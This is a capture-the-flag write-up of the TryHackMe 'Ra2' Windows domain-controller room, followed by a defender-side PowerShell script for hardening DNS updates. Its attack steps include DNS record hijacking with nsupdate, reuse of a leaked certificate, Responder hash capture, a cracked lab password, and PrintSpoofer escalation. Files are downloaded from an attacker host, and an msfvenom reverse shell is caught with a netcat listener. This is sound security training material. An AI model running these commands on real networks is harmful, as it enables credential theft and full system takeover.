Ra2 (THM)

TryHackMe Ra2 Write-Up

topics: DNS poisoning (modifying DNS records and reusing a leaked SSL certificate), web application attacks, password cracking, Windows privilege escalation, PrintSpoofer

  1. Enumeration

  2. Local Privilege Escalation

  3. System Privilege Escalation

new tools: responder, dig, pfx2john, nsupdate

Enumeration

Initial autorecon and nmap scan: .././autonmap.sh $ip Full

Inspecting the scans, there are numerous ports open on this machine. However, because of certain open ports like DNS, LDAP/S, Kerberos, RDP, etc., we can surmise that this is a domain controller for an Active Directory environment. Additionally, the DNS enumeration reveals alternative DC names.

Let's add these names to the hosts file and try to dig some additional domains from this machine.

DNS

As this machine seems to be a domain controller, it would make sense to enumerate DNS first to see what information we can obtain.

dig windcorp.thm any @victimIP

We can see the additional domain name hostmaster.thm and the domain that answers a DNS query first. We can also see a flag and a text file left for us to read, which provides a hint to the initial foothold.

Permitting unsecured dynamic DNS updates gives ANY computer (not just domain members) the ability to modify or create DNS records. This means we can effectively change or add any subdomain name (including malicious ones), and even impersonate the server for user authentication and capture hashes.
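As an added defender-side example (not part of the original write-up), the PowerShell below audits a Windows DNS server for zones that accept nonsecure dynamic updates and switches AD-integrated zones to secure-only, which closes the vector used in this room. It assumes the DnsServer module is available and is run with DNS administrator rights on the DC; no zone names beyond what the cmdlets return are assumed.

```powershell
# Added example: audit and harden dynamic-update settings on a Windows DNS server.
# Assumption: run on the DC (or with -ComputerName) with the DnsServer module installed.
Import-Module DnsServer

# DynamicUpdate is one of: None, NonsecureAndSecure, Secure.
# NonsecureAndSecure is the setting that lets any host rewrite records, as the write-up exploits.
$weak = Get-DnsServerZone |
    Where-Object {
        -not $_.IsAutoCreated -and
        $_.ZoneType -eq 'Primary' -and
        $_.DynamicUpdate -eq 'NonsecureAndSecure'
    }

foreach ($zone in $weak) {
    Write-Warning ("Zone {0} accepts unauthenticated dynamic updates" -f $zone.ZoneName)
    # Secure-only updates (Kerberos-authenticated, ACL-checked) require an AD-integrated zone.
    if ($zone.IsDsIntegrated) {
        Set-DnsServerPrimaryZone -Name $zone.ZoneName -DynamicUpdate Secure
    } else {
        Write-Warning ("{0} is file-backed; convert it to AD-integrated before enabling secure updates" -f $zone.ZoneName)
    }
}

# Re-check: every primary zone should now report Secure, or None where updates are not needed.
Get-DnsServerZone |
    Where-Object { $_.ZoneType -eq 'Primary' } |
    Select-Object ZoneName, IsDsIntegrated, DynamicUpdate |
    Format-Table -AutoSize
```

With secure-only updates in place, the nsupdate session shown later in this write-up is refused because the client cannot present a valid TSIG/GSS-TSIG signature.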

HTTPS

We have about three unique subdomains on this domain controller, so we can run a dirsearch scan on each of them.

python3 dirsearch.py -u https://$ip -e php,html,txt

The subdomain selfservice.dev.windcorp.thm returned an interesting /backup directory. Not pictured: we can also see a /powershell directory on fire.windcorp, but we need credentials for it.

Navigating to /backups on selfservice.dev.windcorp.thm

We have a cert.pfx file and an empty config file. Windows servers use .pfx (PKCS#12) files that bundle the certificate and its private key for HTTPS, so a leaked .pfx is enough to stand up a server that presents the same certificate.

Local Privilege Escalation

With the ability to update DNS records and the cert.pfx file in hand, we can now impersonate the HTTPS server on the domain controller. We can point one of the trusted subdomains at the attacking machine and intercept user hashes as clients try to communicate with the controller.

Impersonating the Server

We can recover the certificate password by extracting a hash with pfx2john and cracking it with john.

Next we extract the private key and the certificate from the .pfx file with openssl so they can be used for impersonation.

openssl pkcs12 -in cert.pfx -nocerts -out key.pem -nodes : parse the PKCS#12 file, output only the private key (no certificates) and leave it unencrypted (-nodes)
openssl pkcs12 -in cert.pfx -out crt.pem -clcerts -nodes : same input, output only the client (end-entity) certificate and not the CA chain

The .pem files are now ready to impersonate the HTTPS server. Next we must:

  • update the DNS record of the domain controller to point to the attacking machine with nsupdate

  • verify the answer section with dig

  • copy the cert files to the responder certs folder

  • listen with responder -I tun0

Below are the nsupdate commands to add our attacking machine as the new selfservice.windcorp.thm subdomain on the domain controller.

root@kal:~/ra2# nsupdate
> server victimIP
> update delete selfservice.windcorp.thm
> send
> update add selfservice.windcorp.thm <ttl> A <attackIP>
> send
> quit

Note the syntax of update add: the record name, then the TTL in seconds, then the record type (A here) and the record data; nsupdate rejects the line if the TTL or type is missing.

Responder has captured an HTTP event and logged the NTLMv2 hash of the user edwardle. We can crack this with john.

The credentials edwardle:!Angelus25! should be valid to use with the PowerShell aspx console discovered during HTTPS enumeration. I attempted evil-winrm but it was not successful; we can assume it's disabled for now.

Domain Admin Privilege Escalation

Starting with whoami /priv we can see we hold the very critical SeImpersonatePrivilege, which PrintSpoofer abuses to escalate to SYSTEM.

We need to:

  • make a c:\temp directory

  • craft a reverse shell with msfvenom and listen for it

  • download printspoofer

  • transfer the files to the victim machine and run the program

(New-Object System.Net.WebClient).DownloadFile("http://attackIP/PrintSpoofer.exe", "C:\Temp\print.exe") : (victim) download PrintSpoofer
msfvenom -p windows/shell_reverse_tcp lhost=attackIP lport=53 -f exe -o shell.exe : (attacker) create the reverse shell
(New-Object System.Net.WebClient).DownloadFile("http://attackIP/shell.exe", "C:\Temp\shell.exe") : (victim) download the reverse shell
rlwrap nc -nlvp 53 : (attacker) listen for the reverse shell on port 53
.\print.exe -c shell.exe : (victim, from C:\Temp) run PrintSpoofer with the reverse shell as the command to execute as SYSTEM
